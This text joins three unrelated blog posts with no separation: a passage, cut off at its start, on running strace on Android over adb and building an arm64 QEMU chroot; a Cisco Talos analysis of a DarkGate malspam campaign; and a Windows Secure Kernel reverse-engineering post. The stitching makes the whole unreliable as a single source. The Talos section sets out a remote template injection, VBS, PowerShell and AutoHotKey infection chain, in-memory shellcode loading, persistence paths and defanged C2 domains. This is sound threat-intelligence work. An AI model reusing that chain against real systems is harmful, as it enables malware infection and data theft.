    /lib/ld-linux-aarch64.so.1 (0x0000007faf427000)

We can copy the dependencies and use the appropriate dynamic linker to load them (the `ldd`/`sed` pipeline in the one-liner below enumerates the dependencies):

pi@rpi:~ $ bin=`which strace`; adb push $bin $(ldd $bin | sed -nre 's/^[^/]*(\/.*) \(0x.*\)$/\1/p') /data/local/tmp/
/usr/bin/strace: 1 file pushed, 0 skipped. 19.4 MB/s (1640712 bytes in 0.081s)
/lib/aarch64-linux-gnu/libc.so.6: 1 file pushed, 0 skipped. 23.7 MB/s (1651472 bytes in 0.067s)
/lib/ld-linux-aarch64.so.1: 1 file pushed, 0 skipped. 18.6 MB/s (202904 bytes in 0.010s)
3 files pushed, 0 skipped. 19.0 MB/s (3495088 bytes in 0.176s)
pi@rpi:~ $ adb exec-out /data/local/tmp/ld-linux-aarch64.so.1 --library-path /data/local/tmp/ /data/local/tmp/strace -ttewrite /bin/echo X
10:36:27.842717 write(1, "X\n", 2X
)      = 2
10:36:27.845895 +++ exited with 0 +++

There, perfect, we have strace on our device now, and it only took two ugly one-liners.

Installing that odd architecture on your PC

My preferred way of setting up a cross-architecture Linux chroot is using debootstrap and schroot. This assumes you are using a distribution from the Debian family (I see there is a debootstrap for Fedora as well, but I haven't tried it).

Logan Chien posted a nice and short guide, which basically boils down to the following three sections:

Setting up the tools

kali@kali:~$ apt install debootstrap qemu-user-static schroot

Installing a base system

kali@kali:~$ sudo debootstrap --arch=arm64 bookworm ~/chroots/arm64-test
...
I: Base system installed successfully.

This takes a minute or two and installs a base Debian Bookworm system for arm64. The distribution names come from Debian (http://ftp.debian.org/debian/dists/) or Ubuntu (http://archive.ubuntu.com/ubuntu/dists/). For the architecture names, navigate into the subfolders (for example, http://ftp.debian.org/debian/dists/bookworm/main/). If you need a less common architecture, try the testing channel, which supports riscv64, for example.

Setting up schroot

kali@kali:~$ echo "[arm64-test] 
directory=$HOME/chroots/arm64-test
users=$(whoami)
root-users=$(whoami)
type=directory" | sudo tee /etc/schroot/chroot.d/arm64-test

Now you can enter the chroot:

kali@kali:~$ schroot -c arm64-test
(arm64-test)kali@kali:~$ uname -a
Linux kali 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) aarch64 GNU/Linux
(arm64-test)kali@kali:~$ logout
kali@kali:~$ schroot -c arm64-test -u root
(arm64-test)root@kali:/home/kali# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),119(wireshark),142(kaboxer)

Finish

So, here you have it. Install the wanted binary and copy it to your target device as we did before from the Raspberry Pi.

(arm64-test)kali@kali:~$ # sudo apt install strace adb
...
(arm64-test)kali@kali:~$ bindeps() { echo "$1" $(ldd "$1" | sed -nre "s/^[^/]*(\/.*) \(0x.*\)$/\1/p"); }
(arm64-test)kali@kali:~$ for i in $(bindeps `which strace`); do adb push $i /data/local/tmp/; done
/usr/bin/strace: 1 file pushed, 0 skipped. 13.3 MB/s (1640712 bytes in 0.117s)
/lib/aarch64-linux-gnu/libc.so.6: 1 file pushed, 0 skipped. 14.0 MB/s (1651472 bytes in 0.113s)
/lib/ld-linux-aarch64.so.1: 1 file pushed, 0 skipped. 7.4 MB/s (202904 bytes in 0.026s)
(arm64-test)kali@kali:~$ adb shell
sargo:/ $ xrun() { k=/data/local/tmp; bin=$1; shift; $k/ld* --library-path $k $k/$bin "$@"; }
sargo:/ $ xrun strace -tte write /bin/echo X
16:31:59.159266 write(1, "X\n", 2X
)      = 2
16:31:59.163322 +++ exited with 0 +++

Cross-compiling without cross-compiling

Well, now you have a full Linux distribution of your chosen architecture running, so you can just compile any special tools. Sure, it is emulated through QEMU under the hood, but for anything smallish one does not even notice the performance hit.

And you have avoided dealing with a toolchain to cross-compile for that one-off task.

Running the device’s binaries on your PC

In the above examples, the binary we wished to run was copied onto the target device. Occasionally, one wants to do the reverse: run a binary from the device locally on your PC.

The exact same approach should work, and for anything non-trivial I would recommend a custom-built chroot, so you can easily place the required files in the correct locations (and it is also easy to delete it all later).

For a simple tool though, one can get away by using QEMU:

kali@kali:~/android_test$ adb exec-out 'bindeps() { echo "$1" $(ldd "$1" | sed -nre "s/^[^/]*(\/.*) \(0x.*\)$/\1/p"); }; bindeps `which dexdump`' | xargs -n1 adb pull
/apex/com.android.art/bin/dexdump: 1 file pulled, 0 skipped. 11.6 MB/s (108744 bytes in 0.009s)
/apex/com.android.art/lib64/libdexfile.so: 1 file pulled, 0 skipped. 4.7 MB/s (347040 bytes in 0.070s)
/apex/com.android.art/lib64/libartpalette.so: 1 file pulled, 0 skipped. 2.0 MB/s (14896 bytes in 0.007s)
/apex/com.android.art/lib64/libbase.so: 1 file pulled, 0 skipped. 13.3 MB/s (251152 bytes in 0.018s)
/apex/com.android.art/lib64/libartbase.so: 1 file pulled, 0 skipped. 20.8 MB/s (497272 bytes in 0.023s)
/apex/com.android.art/lib64/libc++.so: 1 file pulled, 0 skipped. 8.1 MB/s (671496 bytes in 0.079s)
/apex/com.android.art/lib64/libziparchive.so: 1 file pulled, 0 skipped. 1.2 MB/s (79752 bytes in 0.066s)
/apex/com.android.runtime/lib64/bionic/libc.so: 1 file pulled, 0 skipped. 26.1 MB/s (1013048 bytes in 0.037s)
/apex/com.android.runtime/lib64/bionic/libdl.so: 1 file pulled, 0 skipped. 2.0 MB/s (13728 bytes in 0.006s)
/apex/com.android.runtime/lib64/bionic/libm.so: 1 file pulled, 0 skipped. 12.7 MB/s (221072 bytes in 0.017s)
/system/lib64/libz.so: 1 file pulled, 0 skipped. 6.5 MB/s (98016 bytes in 0.014s)
/system/lib64/liblog.so: 1 file pulled, 0 skipped. 5.8 MB/s (62176 bytes in 0.010s)
/system/lib64/libc++.so: 1 file pulled, 0 skipped. 25.7 MB/s (700400 bytes in 0.026s)
kali@kali:~/android_test$ adb pull /system/bin/linker64
/system/bin/linker64: 1 file pulled, 0 skipped. 13.1 MB/s (1802728 bytes in 0.131s)
kali@kali:~/android_test$ qemu-arm64 -E LD_LIBRARY_PATH=$PWD ./linker64 $PWD/dexdump
linker: Warning: failed to find generated linker configuration from "/linkerconfig/ld.config.txt"
WARNING: linker: Warning: failed to find generated linker configuration from "/linkerconfig/ld.config.txt"
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:126] No file specified
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:41] Copyright (C) 2007 The Android Open Source Project
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:41] 
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:42] dexdump: [-a] [-c] [-d] [-e] [-f] [-h] [-i] [-j] [-l layout] [-n]  [-o outfile] dexfile...
...

With the dynamic linker, dependency libraries and the target binary, we can use qemu-user to run our binary.

The observant reader will notice this differs slightly from the way the dynamic linker was invoked before. Android's linker does not appear to support an argument to specify the library path, so we have used LD_LIBRARY_PATH instead (in the first example above, we could have invoked strace this way as well: LD_LIBRARY_PATH=/data/local/tmp /data/local/tmp/ld-linux-aarch64.so.1 /data/local/tmp/strace).

Epilogue

I hope you found this useful.

Helper functions

The list of dependencies that are to be copied along with the binary can be generated with:

$ bindeps() { echo "$1" $(ldd "$1" | sed -nre "s/^[^/]*(\/.*) \(0x.*\)$/\1/p"); }
$ bindeps `which strace`

The binary can then be run on the target device with the following (note that the path, and possibly the linker arguments, will need adjusting):

$ xrun() { k=/data/local/tmp; bin=$1; shift; $k/ld* --library-path $k $k/$bin "$@"; }
$ xrun strace -tte write /bin/echo X

DarkGate switches up its tactics with new payload, email templates


This post was authored by Kalpesh Mantri. 

  • Cisco Talos is actively tracking a recent increase in activity from malicious email campaigns containing a suspicious Microsoft Excel attachment that, when opened, infects the victim's system with the DarkGate malware. 
  • These campaigns, active since the second week of March, leverage tactics, techniques, and procedures (TTPs) that we have not previously observed in DarkGate attacks. 
  • These campaigns rely on a technique called “Remote Template Injection” to bypass email security controls and to deceive the user into downloading and executing malicious code when the Excel document is opened.  
  • DarkGate has used AutoIT scripts as part of the infection process for a long time. However, in these campaigns, AutoHotKey scripting was used instead of AutoIT.  
  • The final DarkGate payload is designed to execute in-memory, without ever being written to disk, running directly from within the AutoHotKey.exe process. 

The DarkGate malware family is distinguished by its covert spreading techniques, ability to steal information, evasion strategies, and widespread impact on both individuals and organizations. Recently, DarkGate has been observed distributing malware through Microsoft Teams and even via malvertising campaigns. Notably, in the latest campaign, AutoHotKey scripting was employed instead of AutoIT, indicating the continuous evolution of DarkGate actors in altering the infection chain to evade detection. 

Email campaigns 

This research began when a considerable number of our clients reported receiving emails, each containing a Microsoft Excel file attachment that followed a distinct pattern in its naming convention. 

[Figure: sample malspam emails with patterned Excel attachment names]

Talos’ intent analysis of these emails revealed that they primarily pertained to financial or official matters, compelling the recipient to take action by opening the attached document. 

This peculiar trend prompted us to conduct an in-depth investigation into this widespread malspam activity. Our initial findings linked the indicators of compromise (IOCs) to the DarkGate malware.  

The table below includes some of the observed changes in attachment naming convention patterns over time.  

Start Date | End Date | Format | Examples

March 12, 2024 | March 19, 2024 | march-D%-2024.xlsx | march-D5676-2024.xlsx, march-D3230-2024.xlsx, march-D2091-2024.xlsx

March 15, 2024 | March 20, 2024 | ACH-%March.xlsx | ACH-5101-15March.xlsx, ACH-5392-15March.xlsx, ACH-4619-15March.xlsx

March 18, 2024 | March 19, 2024 | attach#%-2024.xlsx | attach#4919-18-03-2024.xlsx, attach#8517-18-03-2024.xlsx, attach#4339-18-03-2024.xlsx

March 19, 2024 | March 20, 2024 | march19-D%-2024.xlsx | march19-D3175-2024.xlsx, march19-D5648-2024.xlsx, march19-D8858-2024.xlsx

March 26, 2024 | March 26, 2024 | re-march-26-2024-%.xls? | re-march-26-2024-4187.xlsx, re-march-26-2024-7964.xlsx, re-march-26-2024-4187.xls

April 3, 2024 | April 5, 2024 | april2024-%.xlsx | april2024-2032.xlsx, april2024-3378.xlsx, april2024-4268.xlsx

April 9, 2024 | April 9, 2024 | statapril2024-%.xlsx | statapril2024-9505.xlsx, statapril2024-9518.xlsx, statapril2024-9524.xlsx

April 10, 2024 | April 10, 2024 | 4_10_AC-%.xlsx* | 4_10_AC-1177.xlsx, 4_10_AC-1288.xlsx, 4_10_AC-1301.xlsx

*Variant redirecting to JavaScript file instead of VBS. 

Victimology 

Based on Cisco Talos telemetry, this campaign targets the U.S. most often of any geographic region.

[Figure: campaign targeting by region]

Healthcare technologies and telecommunications were the most-targeted sectors, but campaign activity was observed targeting a wide range of industries. 

[Figure: campaign targeting by industry sector]

Technical analysis 

Our telemetry indicates that malspam emails were the primary delivery vector for this campaign. It is an active campaign that uses attached Excel documents to lure users into downloading and executing remote payloads.  

As shown below, the Excel spreadsheet has an embedded object with an external link to an attacker-controlled Server Message Block (SMB) file share. 

[Figure: Excel spreadsheet with embedded object linking to an attacker-controlled SMB share]

The overall infection process associated with this campaign is shown below. 

[Figure: overall infection process]

The infection process begins when the malicious Excel document is opened. These files were specially crafted to utilize a technique called “Remote Template Injection” to trigger the automatic download and execution of malicious content hosted on a remote server. 

Remote Template Injection is an attack technique that exploits a legitimate Excel functionality wherein templates can be imported from external sources to expand a document’s functions and features. By exploiting the inherent trust users place in document files, this method skillfully evades security protocols that may not be as stringent for document templates compared to executable files. It represents a refined tactic for attackers to establish a presence within a system, sidestepping the need for conventional executable malware.  

When the Excel file is opened, it downloads and executes a VBS file from an attacker-controlled server. 

The VBS file is appended with a command that executes a PowerShell script from the DarkGate command and control (C2) server. 

[Figure: VBS file with appended command that launches PowerShell]

This PowerShell script retrieves the next stage’s components and executes them, as shown below. 

[Figure: PowerShell script retrieving and executing the next-stage components]

Payload analysis 

On March 12, 2024, the DarkGate campaign transitioned from deploying AutoIT scripts to employing AutoHotKey scripts. 

AutoIT and AutoHotKey are scripting languages designed for automating tasks on Windows. While both languages serve similar purposes, their differences lie in their syntax complexity, feature sets and community resources. AutoHotKey offers more advanced text manipulation features, extensive support for hotkeys, and a vast library of user-contributed scripts for various purposes. While both AutoIT and AutoHotKey have legitimate purposes, they are often abused by adversaries to run malicious scripts, consistent with other scripting languages often observed in infection chains. 

As shown in the screenshot above, one of the files retrieved is ‘test.txt.’ Within this file there is a base64-encoded blob that, when decoded, transforms into binary data. This binary data is then processed to execute the DarkGate malware payload directly within memory on infected systems. 

[Figure: base64-encoded blob within test.txt]

As shown in the previous PowerShell code, payloads are initially saved to disk within a directory (C:\rimz\) on the system. The directory name changes across infection chains that were analyzed. 

[Figure: payload components written to the C:\rimz\ directory]

In this case, the attacker was using a legitimate copy of the AutoHotKey binary (AutoHotKey.exe) to execute a malicious AHK script (script.ahk). 

[Figure: legitimate AutoHotKey.exe executing the malicious script.ahk]

The executed AHK script reads content from the text file (test.txt), decodes it in memory, and executes it without ever saving the decoded DarkGate payload to disk. This file also contains shellcode that is loaded and executed by the AHK script, as shown below. 

[Figure: AHK script decoding and executing the in-memory payload and shellcode]

Persistence mechanisms 

Components used during the final stage of the infection process are stored at the following directory location: 

  • C:\ProgramData\cccddcb\AutoHotKey.exe 
  • C:\ProgramData\cccddcb\hafbccc.ahk 
  • C:\ProgramData\cccddcb\test.txt 

Persistence across reboots is established through the creation of a shortcut file within the Startup directory on the infected system. 

Shortcut Parameter | Value

Shortcut Location | C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DfAchhd.lnk 

Shortcut Execution | C:\ProgramData\cccddcb\AutoHotkey.exe "C:\ProgramData\cccddcb\hafbccc.ahk" 

Talos’ threat intelligence and detection response teams have successfully developed detection for these campaigns and blocked them as appropriate on Cisco Secure products. However, the evolving nature of recent DarkGate campaigns, as demonstrated by the shift from AutoIT to AutoHotKey scripts and the use of remote template injection, serves as a stark reminder of the continuous arms race in cybersecurity. 

Coverage 

 Ways our customers can detect and block this threat are listed below.  

[Figure: Cisco Secure product coverage matrix]

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The following Snort SIDs apply to this threat:  

  • Snort 2 SIDs: 3, 12, 11192, 13667, 15306, 16642, 19187, 23256, 23861, 44484, 44485, 44486, 44487, 44488, 63521, 63522, 63523, 63524 
  • Snort 3 SIDs: 1, 16, 260, 11192, 15306, 36376, 44484, 44486, 44488, 63521, 63522, 63523, 63524 

The following ClamAV detections are also available for this threat:  

  • Doc.Malware.DarkGateDoc 
  • Ps1.Malware.DarkGate-10030456-0 
  • Vbs.Malware.DarkGate-10030520-0 

Indicators of Compromise (IOCs) 

Indicators of Compromise (IOCs) associated with this threat can be found here.  

Below is an example of the configuration parameters extracted from one of the DarkGate payloads analyzed.  

Configuration Parameter | Value

C2 | hxxp://badbutperfect[.]com, hxxp://withupdate[.]com, hxxp://irreceiver[.]com, hxxp://backupitfirst[.]com, hxxp://goingupdate[.]com, hxxp://buassinnndm[.]net 

Family | DarkGate 

Attributes | anti_analysis = true; anti_debug = false; anti_vm = true; c2_port = 80; internal_mutex = WZqqpfdY (provides the XOR key/marker used for DarkGate payload decryption); ping_interval = 60; startup_persistence = true; username = admin 

Windows Internals: Dissecting Secure Image Objects - Part 1

Introduction

Recently I have been working on an unpublished (at this time) blog post that will look at how securekernel.exe and ntoskrnl.exe work together in order to enable and support the Kernel Control Flow Guard (Kernel CFG) feature, which is enabled under certain circumstances on modern Windows systems. This comes from the fact that I have recently been receiving questions from others on this topic. During the course of my research, I realized that a relatively unknown topic that kept reappearing in my analysis was the concept of Normal Address Ranges (NARs) and Normal Address Table Entries (NTEs), sometimes referred to as NT Address Ranges or NT Address Table Entries. The only mention I have seen of these terms comes from Windows Internals 7th Edition, Part 2, Chapter 9, which was written by Andrea Allievi. The more I dug in, the more I realized this topic could probably use its own blog post.

However, when I started working on that blog post I realized that the concept of “Secure Image Objects” also plays into NAR and NTE creation. Because of this, I realized I maybe could just start with Secure Image objects!

Given the lack of debugging capabilities for securekernel.exe, the lack of user-defined types (UDTs) in the securekernel.exe symbols, and the overall lack of public information, there is no way (as we will see) I will be able to completely map Secure Image objects back to absolute structure definitions (and the same goes for NARs/NTEs). This blog (and subsequent ones) is really just an analysis post outlining things such as Secure System Calls, functionality, and the reverse-engineering methodology I take. I am not an expert on this subject matter (like Andrea, Satoshi Tanda, or others); I am mainly writing up my analysis because there isn’t much information out there on these subjects, and I also greatly enjoy writing long-form blog posts. With that said, the “song-and-dance” performed between NT and the Secure Kernel to load images, share resources, etc. is a very complex (in my mind) topic. The terms I use are based on the names of the functions involved, and may differ from the actual terms, so please feel free to reach out with improvements/corrections. Lastly, Secure Image objects can be created for images other than drivers; we will be focusing on driver loads. With this said, I hope you enjoy!

SECURE_IMAGE Overview

Windows Internals, 7th Edition, Chapter 9 gives a brief mention of SECURE_IMAGE objects:

…The NAR contains some information of the range (such as its base address and size) and a pointer to a SECURE_IMAGE data structure, which is used for describing runtime drivers (in general, images verified using Secure HVCI, including user mode images used for trustlets) loaded in VTL 0. Boot-loaded drivers do not use the SECURE_IMAGE data structure because they are treated by the NT memory manager as private pages that contain executable code…

As we know with HVCI (at the risk of being interpreted as pretentious, which is not my intent, I have linked my own blog post), VTL 1 is responsible for enforcing W^X (write XOR execute, meaning WX memory is not allowed). Given that drivers can be dynamically loaded at any time on Windows, VTL 0 and VTL 1 need to work together in order to ensure that before such drivers are actually loaded, the Secure Kernel has the opportunity to apply the correct safeguards to ensure the new driver isn’t used, for instance, to load unsigned code. This whole process starts with the creation of the Secure Image object.

This is required because the Secure Kernel needs to monitor access to some of the memory present in VTL 0, where “normal” drivers live. Secure Image objects allow the Secure Kernel to manage the state of these runtime drivers. Managing the state of these drivers is crucial to enforcing many of the mitigations provided by virtualization capabilities, such as HVCI. A very basic example: when a driver is being loaded in VTL 0, we know that VTL 1 needs to create the proper Second Level Address Translation (SLAT) protections for each of the sections that make up the driver (e.g., the .text section should be RX, .data RW, etc.). In order for VTL 1 to do that, it would likely need some additional information and context, such as the address of the entry point of the image, the number of PE sections, etc. This is the sort of thing a Secure Image object can provide: much of the context that the Secure Kernel needs to “do its thing”.

This whole process starts with code in NT which, upon loading runtime drivers, results in NT extracting the headers from the image being loaded and sending this information to the Secure Kernel in order to perform the initial header verification and build out the Secure Image object.

I want to make clear again - although the process for creating a Secure Image object may start with what we are about to see in this blog post, even after the Secure System Call returns to VTL 0 in order to create the initial object, there is still a “song-and-dance” performed by ntoskrnl.exe, securekernel.exe, and skci.dll. This specific blog does not go over this whole “song-and-dance”. This blog will focus on the initial steps taken to get the object created in the Secure Kernel. In future blogs we will look at what happens after the initial object is created. For now, we will just stick with the initial object creation.

A Tiny Secure System Call Primer

Secure Image object creation begins through a mechanism known as a Secure System Call. At a high level, Secure System Calls work similarly to traditional system calls:

  1. An untrusted component (NT in this case) needs to access a resource in a privileged component (Secure Kernel in this case)
  2. The privileged component exposes an interface to the untrusted component
  3. The untrusted component packs up information it wants to send to the privileged component
  4. The untrusted component specifies a given “call number” to indicate what kind of resource it needs access to
  5. The privileged component takes all of the information, verifies it, and acts on it

A “traditional” system call will result in the emission of a syscall assembly instruction, which performs work in order to change the current execution context from user-mode to kernel-mode. Once in kernel-mode, the original request reaches a specified dispatch function which is responsible for servicing the request outlined by the System Call Number. A Secure System Call works almost the same in concept (but not necessarily in the technical implementation). Instead of syscall, however, a vmcall instruction is emitted. vmcall is not specific to the Secure Kernel; it is a general virtualization (VMX) instruction. A vmcall instruction simply allows guest software (in our case, as we know from HVCI, VTL 0 - which is where NT lives - is effectively treated as “the guest”) to make a call into the underlying VM monitor/hypervisor (Hyper-V). In other words, this results in a call into the Secure Kernel from NT.

The NT function nt!VslpEnterIumSecureMode is a wrapper for emitting a vmcall. The thought process can therefore be summed up as this: if a given function invokes nt!VslpEnterIumSecureMode, the caller of said function is (generally speaking, mind you) responsible for invoking a Secure System Call.

Although performing dynamic analysis on the Secure Kernel is difficult, one thing to note here is that the order in which the Secure System Call arguments are packed and shipped to the Secure Kernel is the same order the Secure Kernel will operate on them. As an example, the function nt!VslCreateSecureImageSection is one of the many functions in NT that results in a call to nt!VslpEnterIumSecureMode.

The Secure System Call Number, or SSCN, is stored in the RDX register. The R9 register, although not obvious from the screenshot above, is responsible for storing the packed Secure System Call arguments. These arguments are packed in the form of an in-memory structure (which we will look at later).

On the Secure Kernel side, the function securekernel!IumInvokeSecureService is a very large function which is the “entry point” for Secure System Calls. It contains a large switch/case statement that maps a given SSCN to a specific dispatch function handler. The arguments are unpacked and operated on by the Secure Kernel in the exact same order they were packed (in the screenshot below, a1 is the address of the structure, and we can see various offsets being extracted from it, which is due to struct->Member access).
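
To make the flow concrete, below is a minimal C sketch of how such a dispatcher behaves. The signature and all names ending in "Sketch" are invented for illustration; only the mapping of SSCN 0x19 to Secure Image section creation, which we will examine shortly, comes from the analysis.

typedef long NTSTATUS;
#define STATUS_SUCCESS           ((NTSTATUS)0x00000000L)
#define STATUS_INVALID_PARAMETER ((NTSTATUS)0xC000000DL)

/* Stand-in for securekernel!SkmmCreateSecureImageSection: it would unpack
   the argument structure in the same order NT packed it. */
static NTSTATUS SkmmCreateSecureImageSectionSketch(void *PackedArgs)
{
    (void)PackedArgs;
    return STATUS_SUCCESS;
}

/* Stand-in for securekernel!IumInvokeSecureService: the SSCN selects the
   handler; the packed argument structure is passed through untouched. */
static NTSTATUS IumInvokeSecureServiceSketch(unsigned long Sscn, void *PackedArgs)
{
    switch (Sscn) {
    case 0x19: /* Secure Image section creation */
        return SkmmCreateSecureImageSectionSketch(PackedArgs);
    /* ...one case per supported SSCN... */
    default:
        return STATUS_INVALID_PARAMETER;
    }
}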

Now that we have a bit of an understanding here, let’s move on to see how the Secure System Call mechanism is used to help Secure Kernel create a Secure Image object!

SECURE_IMAGE (Non-Comprehensive!) Creation Overview

Although by no means is this a surefire way to identify this data, a method that could be employed to locate the functionality for creating Secure Image objects is to simply search for terms like SecureImage in the Secure Kernel symbols. Within securekernel!SkmmCreateSecureImageSection we see a call to an externally-imported function, skci!SkciCreateSecureImage.

This means it is highly likely that securekernel!SkmmCreateSecureImageSection is responsible for accepting some parameters surrounding Secure Image object creation and forwarding them on to skci!SkciCreateSecureImage. Focusing our attention on securekernel!SkmmCreateSecureImageSection, we can see that this functionality is triggered through a Secure System Call with an SSCN of 0x19 (the screenshot below is from the securekernel!IumInvokeSecureService Secure System Call dispatch function).

Again, by no means is this correct in all cases, but I have noticed that most of the time when a Secure System Call is issued from ntoskrnl.exe, the corresponding “lowest-level function”, which is responsible for invoking nt!VslpEnterIumSecureMode, has a similar name to the associated dispatch function in securekernel.exe which handles the Secure System Call. Luckily this applies here, and the function which issues the SSCN of 0x19 is nt!VslCreateSecureImageSection.

Based on the call stack here, we can see that when a new section object is created for a target driver image being loaded, the ci.dll module is dispatched in order to determine if the image is compatible with HVCI (if it isn’t, STATUS_INVALID_IMAGE_HASH is returned). Examining the parameters of the Secure System Call reveals the following.

Note that at several points I will have restarted the machine the analysis was performed on and due to KASLR the addresses will change. I will provide enough context in the post to overcome this obstacle.

With Secure System Calls, the first parameter (seems to be) always 0 and/or reserved. This means the arguments to create a Secure Image object are packed as follows.

typedef struct _SECURE_IMAGE_CREATE_ARGS
{
    PVOID Reserved;
    PVOID VirtualAddress;
    PVOID PageFrameNumber;
    bool UnknownBool;
    ULONG UnknownUlong;
    ULONG UnknownUlong1;
} SECURE_IMAGE_CREATE_ARGS;

As a small point of contention, I know that the page frame number is such because I am used to looking into memory operations that involve both physical and virtual addresses. Anytime I am dealing with some sort of lower-level concept, like loading a driver into memory, and I see a ULONG-sized value paired with a virtual address, I always suspect it could be a PFN - especially when the value is not page-aligned. A physical memory address is simply (page frame number * 0x1000), plus any potential offset. Since the value does not end in 0 or 00 (as a page-aligned address would), this tells me it is likely the page frame number. This is not a “sure” method, but I will show how I validated it below.
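
As a quick worked example of the arithmetic above (a sketch only; the standard 4KB page size is assumed):

#include <stdint.h>

/* Physical address = (PFN * 0x1000) + offset within the page. */
static uint64_t PhysicalFromPfn(uint64_t PageFrameNumber, uint64_t ByteOffset)
{
    return (PageFrameNumber << 12) + ByteOffset;
}

/* Example: PFN 0x1ad2 with in-page offset 0x250 -> physical address 0x1ad2250. */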

At first, I was pretty stuck on what this first virtual address was used for. We previously saw the call stack responsible for invoking nt!VslCreateSecureImageSection. If you trace execution in IDA, however, you will quickly see this call stack is a bit convoluted: most of the functions are invoked via function pointers passed as input parameters from other functions, making tracing the arguments a bit difficult. Fortunately, I saw that this virtual address was used in a call to securekernel!SkmmMapDataTransfer almost immediately within the Secure System Call handler function (securekernel!SkmmCreateSecureImageSection). Note that although the IDA output is annotated a bit with additional information, we will get to that shortly.

It seems this function is actually publicly documented thanks to Saar Amar and Daniel King’s BlackHat talk! This reveals to us that the first argument is an MDL (Memory Descriptor List), while the second parameter, PageFrameNumber, is a page frame number whose use we don’t know yet.

According to the talk, securekernel.exe tends to use MDLs, which are provided by VTL 0, for cases where data may need to be accessed by VTL 1. By no means is this an MDL internals post, but I will give a brief overview. An MDL (nt!_MDL) is effectively a fixed-size header which is prepended to a variable-length array of page frame numbers (PFNs). Virtual memory, as we know, is contiguous. The normal size of a page on Windows is 4096, or 0x1000, bytes. Using a contrived example (not taking into account any optimizations, etc.), let’s say a piece of malware allocated 0x2000 bytes of memory and stored shellcode in that same allocation. We could expect the layout of memory to look as follows.

We can see in this example the shellcode spans the virtual pages 0x1ad2000 and 0x1ad3000. However, this is the virtual location, which is contiguous. In the next example, the reality of the situation creeps in as the physical pages which back the shellcode are in two separate locations.

An MDL would be used in this case to describe the physical layout of a virtual memory region. The MDL effectively says: “I have this contiguous buffer in virtual memory, and here are the physical, non-contiguous page(s) which back this contiguous range of virtual memory”.

MDLs are also typically used for direct memory access (DMA) operations. DMA operations don’t have the luxury of much verification, because they need to access data quickly (think UDP vs. TCP). Because of this, an MDL is used: the memory range it describes is typically first locked into memory so that the DMA operation never accesses invalid memory.

One of the main features of an MDL is that it allows multiple mappings of the virtual address range a given MDL describes (StartVa is the beginning of the virtual address range the MDL describes). For instance, consider an MDL with the following layout: a user-mode buffer is described by the MDL’s StartVa. As we know, user-mode addresses are only valid within the process context in which they reside (the address space is per-process, based on the current page table directory loaded into the CR3 register). Let’s say that a driver, running in an arbitrary context, needs to access the information in the user-mode buffer contained in Mdl->StartVa. If the driver goes to access this buffer while the current process context is processA.exe, but the address was only valid in processB.exe, you are accessing invalid memory and would cause a crash.

An MDL allows you, through the MmGetSystemAddressForMdlSafe API, to request that the system map this memory into the system address space (from the non-paged pool). This allows us to access the contents of the user-mode buffer, through a kernel-mode address, in an arbitrary process context.
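
To illustrate the pattern in familiar territory, here is a minimal sketch of how a normal VTL 0 driver uses this API. The function name is invented and error handling is abbreviated, but the IoAllocateMdl / MmProbeAndLockPages / MmGetSystemAddressForMdlSafe sequence is the standard one:

#include <wdm.h>

/* Lock a user-mode buffer and obtain a system-space mapping of the same
   physical pages, usable from an arbitrary process context. */
NTSTATUS MapUserBufferIntoSystemSpace(PVOID UserBuffer, ULONG Length,
                                      PMDL *OutMdl, PVOID *OutSystemVa)
{
    PMDL mdl = IoAllocateMdl(UserBuffer, Length, FALSE, FALSE, NULL);
    if (mdl == NULL)
        return STATUS_INSUFFICIENT_RESOURCES;

    __try {
        /* Pin the backing physical pages so they cannot go away mid-access. */
        MmProbeAndLockPages(mdl, UserMode, IoReadAccess);
    } __except (EXCEPTION_EXECUTE_HANDLER) {
        IoFreeMdl(mdl);
        return GetExceptionCode();
    }

    /* Map those same physical pages at a kernel-mode virtual address. */
    *OutSystemVa = MmGetSystemAddressForMdlSafe(mdl, NormalPagePriority);
    if (*OutSystemVa == NULL) {
        MmUnlockPages(mdl);
        IoFreeMdl(mdl);
        return STATUS_INSUFFICIENT_RESOURCES;
    }

    *OutMdl = mdl;
    return STATUS_SUCCESS;
}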

Now, using that knowledge, we can see that VTL 0 and VTL 1 use MDLs for the exact same reason! We can think of VTL 0 as the “user-mode” portion and VTL 1 as the “kernel-mode” portion, where VTL 0 has an address with data that VTL 1 wants. VTL 1 can take that data (in the form of an MDL) and map it into VTL 1 so it can safely access the contents of memory described by the MDL.

Taking a look back at how the MDL looks, we can see that StartVa, which is the buffer the MDL describes, is some sort of base address. We can confirm this is actually the base address of an image being loaded because it contains an nt!_IMAGE_DOS_HEADER (0x5a4d, the “MZ” magic for a PE file, is found at the beginning of the image, and a kernel image is a PE file).

